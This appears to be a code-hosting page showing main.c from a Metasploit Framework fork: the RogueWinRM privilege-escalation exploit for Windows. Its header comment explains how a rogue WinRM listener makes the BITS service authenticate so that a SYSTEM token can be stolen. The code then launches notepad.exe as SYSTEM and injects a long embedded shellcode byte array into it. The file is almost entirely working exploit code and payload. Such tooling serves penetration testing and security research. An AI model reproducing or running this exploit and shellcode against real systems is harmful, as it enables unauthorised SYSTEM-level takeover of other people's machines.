dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/external/source/exploits/drunkpotato/RogueWinRM exe/main.c

38 lines
4.4 KiB
C
Raw Permalink Blame History

/*
This is an escalation privilege exploit which launch an arbitrary process as SYSTEM user.
It takes advantage of the BITS behavior which always try to connect on port 5985 (Windows
Remote Management) even if there is no WinRM service listening on that port. This exploit
launch a rogue WinRM service which force BITS service to authenticate by sending it a 401
challenge response packet. The authentication allows to steal a SYSTEM token as a primary
token, and use it to launch an arbitrary process as SYSTEM.
In practice, this exploit launch notepad.exe as SYSTEM. Then, it copies the shellcode
received from metasploit into the remote SYSTEM process and make it trigger its execution.
Details of the vulnerability here :
https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
This exploit was developed from decoder's POC here:
https://github.com/antonioCoco/RogueWinRM
PREREQUISITES/
- Port 5985 must be free
- BITS must not be running
WARNING:
- As this exploit launches a services, a firewall popup may appear.
*/
#include "../Common_Src_Files/pch.h"
int main(int argc, char** argv)
{
int exit_status = -1;
char shellcode[] = "47001\x00notepad.exe\x00\x31\x33\x38\x34\00\x48\x31\xc9\x48\x81\xe9\xa1\xff\xff\xff\x48\x8d\x05\xef\xff\xff\xff\x48\xbb\x6c\xdd\xf4\xfa\xe9\x0d\x46\xb4\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x90\x95\x77\x1e\x19\xe5\x8a\xb4\x6c\xdd\xb5\xab\xa8\x5d\x14\xe5\x24\xec\x26\x9f\xa1\x86\x14\xd4\x3a\x95\x7f\xa8\xf1\x45\xcd\xe6\x4c\x95\x7f\x88\xb9\x45\x49\x03\x26\x97\xb9\xcb\x20\x45\x77\x74\xc0\xe1\x95\x86\xeb\x21\x66\xf5\xad\x14\xf9\xbb\xe8\xcc\xa4\x59\x3e\x9c\xa5\xb2\x62\x5f\x66\x3f\x2e\xe1\xbc\xfb\x39\x6b\xc7\xcc\x74\xd6\xf6\xf5\x6c\x7f\x46\xb4\x6c\x56\x74\x72\xe9\x0d\x46\xfc\xe9\x1d\x80\x9d\xa1\x0c\x96\xf0\xe7\x9d\xd4\xaa\xa0\x0c\x96\x3f\x24\xc5\x17\xac\xa4\x3c\x8f\xfc\x93\x14\xb5\x71\xdd\x85\x0e\xb5\xba\x95\xc5\x3a\x45\x4c\x87\x7d\x61\x9c\xf5\x3b\xd1\xed\x33\x45\x20\xde\xb8\xde\xe1\x48\x7f\x65\x19\x05\xac\xbe\x62\x4d\x62\xfd\x6d\x0d\x92\xbb\x62\x01\x0e\xf0\xe7\x9d\xe8\xb3\xe8\xdd\x07\x3f\x68\x55\xbc\xfb\x39\x4c\x1e\xf5\x34\x83\xad\xa0\xa8\x55\x07\xed\x2d\x87\xbc\x79\x05\x2d\x07\xe6\x93\x3d\xac\xbb\xb0\x57\x0e\x3f\x7e\x34\xbf\x05\x16\xf2\x1b\xfc\x5d\x06\xa7\xb3\x57\x7a\x2f\xda\x05\xb3\x91\x8e\xe9\x4c\x10\xfc\xe5\x3c\xbd\x3d\x2b\x41\x31\x92\x6b\x22\x21\xa9\xba\x45\xcf\x55\x3f\x87\xb9\xcb\x29\x40\x77\x7d\x3f\x8e\xbd\x40\xd3\x5b\x3f\x13\x6c\xdd\xf4\xfa\x16\xd8\xae\xb9\x6c\xdd\xf4\xcb\xd0\x3f\x68\x85\x5a\xe5\xda\xcb\xc7\x3e\x72\xb4\x36\x95\x7d\x3b\xa0\xca\x86\x08\x6d\xdd\xf4\xb7\xd8\xc4\x15\xe7\x06\xde\xa7\xb3\x53\x5a\xcf\x2b\xaa\xdd\xf4\xfa\xe9\xf2\x93\x5c\xa0\xdd\xf4\xfa\xc6\x48\x71\xd8\x5a\xb5\xb1\xca\xb3\x3f\x02\xcc\x0f\x9b\xc5\xca\xbf\x4c\x7f\xda\x06\xb4\xb5\xcc\xaa\x64\x11\xde\x1e\x8b\xad\xbf\xdb\x7c\x21\xd2\x06\xae\xa6\x90\x88\x54\x0c\xdc\x2b\x95\xc1\xb5\xa5\x62\x20\xcd\x16\x87\xa4\x9c\xdf\x49\x02\xee\x55\xb9\xa1\xc2\xbc\x43\x0c\xc2\x3f\xa5\x92\xd7\x99\x44\x3c\xf5\x08\xe9\xa1\x9c\x86\x67\x33\xda\x55\xe9\xcd\xac\x8e\x6e\x2e\xfe\x04\x91\x9f\xb2\xb1\x67\x37\xcd\x3f\xb1\xa4\xa0\x9a\x47\x0b\xeb\x1f\x97\xb0\x8d\xab\x4e\x70\xc1\x36\xb0\xc7\xa3\xc4\x6f\x21\xd6\x54\xf0\xab\x9c\xc4\x4c\x32\xdb\x20\xed\x91\xb1\x86\x3d\x27\xde\x2f\x9a\x90\xa9\xb9\x78\x0d\xd9\x0f\xa8\xc4\x94\xa7\x6e\x6b\xfd\x5c\x97\x97\x82\x9c\x77\x13\xfe\x02\x94\x99\xcb\xa1\x7e\x76\x83\x5e\x99\x82\x82\x8a\x3a\x3c\x87\x34\x8d\xb0\xaa\xba\x66\x75\x8c\x5e\xab\xbe\xb9\x8f\x47\x33\x83\x3b\xf0\x97\x82\x9f\x49\x14\xb4\x24\x54\x35\xa9\xb3\x4c\x1e\xf9\x5d\x14\xa7\xb2\x51\x0d\x74\x1c\xe8\xdd\xf4\xfa\xe9\x5d\x15\xe7\x25\x1a\x36\x11\xbc\x23\x7d\x4b\xb9\x95\x7d\x3c\x83\x07\x19\xfc\xe5\x2c\x9e\xe5\xb3\x5f\x2e\x34\x5f\xdd\xf4\xb3\x60\xed\x2c\xb0\x2d\x84\xbd\x40\x9c\x4b\xd8\x32\x6c\xdd\xf4\xfa\x16\xd8\x0b\x85\xac\x8e\xae\xb2\x60\xfc\x0b\x85\xa5\x90\xc5\x33\xba\x5e\x0f\x73\xae\xf0\xf2\xe2\x92\xf2\x93\x31\xac\xa8\xeb\xb2\x2e\xcc\xce\xa7\x6c\xdd\xbd\x40\xad\xfd\x73\x54\x6c\xdd\xf4\xfa\x16\xd8\x0e\x4b\xa3\xa9\xf6\x11\x43\xe5\x13\xb4\x6c\xdd\xa7\xa3\x83\x4d\x1c\xfd\xe5\x0c\x35\x18\xf9\x44\x81\x74\x6c\xcd\xf4\xfa\xa0\xb7\x1e\x10\x3f\x38\xf4\xfa\xe9\x0d\xb9\x61\x24\x4e\xa7\xa9\xa1\x84\xa1\xfc\xe5\x2c\xbc\x73\x33\x44\x81\x74\x6c\xfd\xf4\xfa\xa0\x84\xbf\xfd\xd6\xcf\x62\x73\x0b\x0d\x46\xb4\x6c\x22\x21\xb2\x6a\xc9\x66\x31\xac\xa9\x46\x9c\x62\x0a\x0e\xb5\xaf\x58\x34\x8f\x3b\x55\x85\xec\x06\xdd\xad\xb3\x2e\xcf\xb6\x01\xce\x8b\x0b\x2f\xe9\x0d\x46\xb4";
dprintf("[main] Entry point.");
exit_status = RunRogueWinRM(shellcode);
return exit_status;
}
Reference in New Issue View Git Blame Copy Permalink